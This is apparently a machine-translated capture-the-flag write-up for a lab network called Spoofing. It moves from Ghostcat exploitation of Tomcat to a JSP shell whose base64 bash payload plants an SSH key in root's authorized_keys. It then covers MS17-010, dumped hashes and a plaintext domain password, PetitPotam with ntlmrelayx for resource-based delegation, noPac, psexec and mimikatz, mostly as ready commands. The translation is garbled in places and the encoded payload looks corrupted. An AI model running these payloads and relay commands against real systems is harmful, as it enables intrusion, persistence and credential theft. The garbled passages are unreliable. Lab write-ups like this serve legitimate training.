Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Spoofing Writeup

Posted April 10Apr 10

0x01 – Info

Tag: Tomcat, NTLM, WebClient, Coerce Authentication, noPac

0x02 – Recon

Target external ip 47.92.146.66

Nmap results

Focus on port 8009 (ajp) means tomcat (corresponding to tomcat tag of the shooting range) directory scan, the 404 page is displayed as tomcat 9.0.30 Playing with Ghost cat

Test with this project

https://github.com/00theway/Ghostcat-CNVD-2020-10487

Read /web-inf/web.xml

url-pattern The result is saved as a dictionary

FFuf

Follow uploadservlet

Upload temp.txt

Return file address ./upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt

Replace ./upload to /upload, successfully read the uploaded file

python3 ajpShooter.py http://47.92.146.66:8080 8009 /upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt read

0x03 – GhostCat command execution

Get ready shell.txt % java.io.InputStream in=Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDL3NKaDY4Uk5hWktLakNQaE40WUxpSnJ4eDR3N3JtbDBGcFRmMTNYNHVKZlpFZm4yU25scE9rdXQ0OE1LdURHOEtDcXczRW0zNU9odXdUa2p3ZEkvRGhGN3ZSeTB0T2xtWDE5NmJHcXpndE5pM1YzUHExc3NC MzV5Ui85SHJ6ZjVEdHdqS2NKdkphV0RuZzU2UWhHZjlnR21vdUZVQWV2QjdsUWl3a01FNWNxTzVsQTRwUm5KVEh2RU1OQUkxQkc3MTBEeWNKT28rNGh1TGNNVjZhdUs3UXdKTWdnN0oyU2U5TEpGZWk2R2g0amJUSGRhdmNBVjV6VVJZeFI4QVNXSmNqY29tM2dMUEE1UWNxSzNzSERRVmswUHllaT R3cEJwWWlFUGlHcHlQR2Y1T3ErUU0xQmJyR0gvTlRBYnZWa3dDZnBkRURWdVBNNWhHOFY4c09HTjIxczlWazFjMVBXaEh2WDZ1ejhRaDRNdUdnQlRYSHlZb3duTjg3OTExVDVGR0VjVzlWeUh1cm9FSVJtdE9sY3dBYmRMc0k0NVhOS1o0aWoxdERLNTRTMmpXWXhJTjhSL1ZuUnV2RVVoTVpGOUla bDM3UW5EQnBFR25LTXFjTVE4cHVUZUJBMngvSURHMFR6MWxjVGk5WHp5WjVheTd4dTJwZStidXhWT1BSQ2M9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcmml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==}|{base64,-d}|{bash,-i}").getInputStream(); int a=-1; byte[] b=new byte[2048]; out.print("pre"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("/pre");%

Upload shell.txt Execute uploaded code SSH – flag01

0x04 – Portal Ubuntu: 172.22.11.76

SSH Nothing, just go through to open the agent to scan 445 for the agent, and get the information of three hosts 172.22.11.45 XR-Desktop.xiaorang.lab

172.22.11.6 xiaorang-dc.xiaorang.lab

172.22.11.26 XR-LCM3AE8B.xiaorang.lab

Pay attention to 172.22.11.45 – windows7 – MS17 MS17 completed in one go Basic operations

Credential List Administrator 4430c690b4c1ab3f4fe4f8ac0410de4a – (local credentials)

John 03cae082068e8d55ea307b75581a8859 – (local credentials)

XR-DESKTOP$ 3aa5c26b39a226ab2517d9c57ef07e3e – (Domain Credentials)

yangmei 25e42ef4cc0ab6a8ff9e3edbbda91841 – xrihGHgoNZQ (plain text) – (domain credentials)

I have tried the combination blasting, there is nothing, I just skipped the demonstration here and went directly to the domain penetration link

Flag2 Add domain user yangmei to the local administrator of the machine Determine the domain control IP to 172.22.11.6 – xiaorang-dc Bloodhound collection

0x05 – Domain penetration link, entrance XR-Desktop: 172.22.11.45

Let's go through this quickly (summary in one sentence: you can't directly take down the domain control) The password/hashes combination obtained using the username combination collected by Bloodhound was blasted. No other new users were found to have MAQ=0. The computer cannot be added. The current LDAP does not have TLS, and the computer cannot be added remotely. There are two methods for the add computer of impacket. Samr and ldaps. samr is restricted by MAQ=0, and cannot add computers; ldaps is restricted by no TLS + MAQ=0. Domain control exists nopac. Current user yangmei uses nopac and does not kill ACL domain control exists nopac for computer container in the domain. Current user yangmei does not have WriteDacl permission on the current windows machine xr-desktop, which means that DFscoerce and petitpotam cannot be modified in SamAccountName domain, but CVE-2019-1040 does not exist, so DFscoerce is abandoned and petitpotam is given priority to using petitpotamNoPac exploit:Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)Petitpotam Scan No ADCS + Petitpotam + ntlm relay play

Attack chain: Use petitpotam to trigger the target of the vulnerability and enable the webclient service. Use petitpotam to trigger the target to access our http relay service. The target will use webclient to carry ntlm authentication to access our relay, and relay its authentication to ldap, obtain the identity of the machine account, and modify its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute as the machine account, allowing our malicious machine account to simulate and authenticate access to the target machine (RBCD) to meet the conditions. The target machine needs to enable the webclient service.

WebClient scan, and it is confirmed that it can only be won. 172.22.11.26 (XR-LCM3AE8B) Relay Attack Preface: The relay play in actual combat only needs to stop 80 occupancy services, and enable port forwarding (portfwd, CS has added rportfwd_local in subsequent versions, and forward directly to the client local). This demonstration is similar to the actual combat play. It does not choose to throw impacket to the entrance ubuntu. This operation relay attack environment configures : port forwarding + proxy

We currently need to forward the server's 80 to the local client's 80 Note: Since SSH's reverse port forwarding only listens to 127.0.0.1, we need some tricks at this time.

As shown in the figure, even if the reverse port forwards port 79 specifies to listen to all (-R \*:79:127.0.0.1:80), port 79 is still bound to 127.0.0.1 (the socks5 proxy is also opened in the figure)

Add an extra socat to forward the traffic 0.0.0.0:80 to 127.0.0.1:79, and then forward it back to the local 80 on the client side, making the 80 listen in disguise at 0.0.0.0

Test, the traffic coming in from 172.22.11.76:80 is directly forwarded to our local area

Open ntlmrelayx locally Note: As mentioned earlier, there is no ldaps, so you cannot use addcomputer and then use the ip to connect to the dc after using the ip to set RBCDsudo proxychains4 -q -f proxychains.conf ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access Use Petitpotam to trigger XR-LCM3AE8B Certified to 172.22.11.76 (ubuntu)proxychains4 -q -f ~/HTB/Spoofing/proxychains.conf python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt XR-LCM3AE8B

It can be seen that the RBCD attack has been completed, and the next step is to apply for the bank notes of XR-LCM3AE8B directly. Apply for XR-LCM3AE8B CIFS notes

0x06 – Domain penetration link – NoPAC, entrance XR-LCM3AE8B: 172.22.11.26

psexecflag03 in C:\users\administrator\flag\flag03.txt (No screenshot here) smbclient.py pass mimikatz obtains new credentials zhanghui 1232126b24cdf8c9bd2f788a9d7c7ed1

Only zhanghui can succeed. zhanghui can create objects in the MA_Admin group. MA_Admin group can create objects for computers, but I didn't see AdFind.exe in bloodhound -b 'CN=Computers,DC=xiaorang,DC=lab' nTSecurityDescriptor -sddl+++

Bloodhound cannot be seen, the main reason is that CreateChild was not collected into json and returned to nopac, plus create-child parameter

0x07 – Domain penetration link – xiaorang-dc

Log in to DCflag04 using the cifs tickets applied for by nopac. C:\users\administrator\flag\flag04.txt (No screenshot here) Domain tube (skip using mimikatz) administrator 0fadb57f5ec71437d1b03eea2cda70b9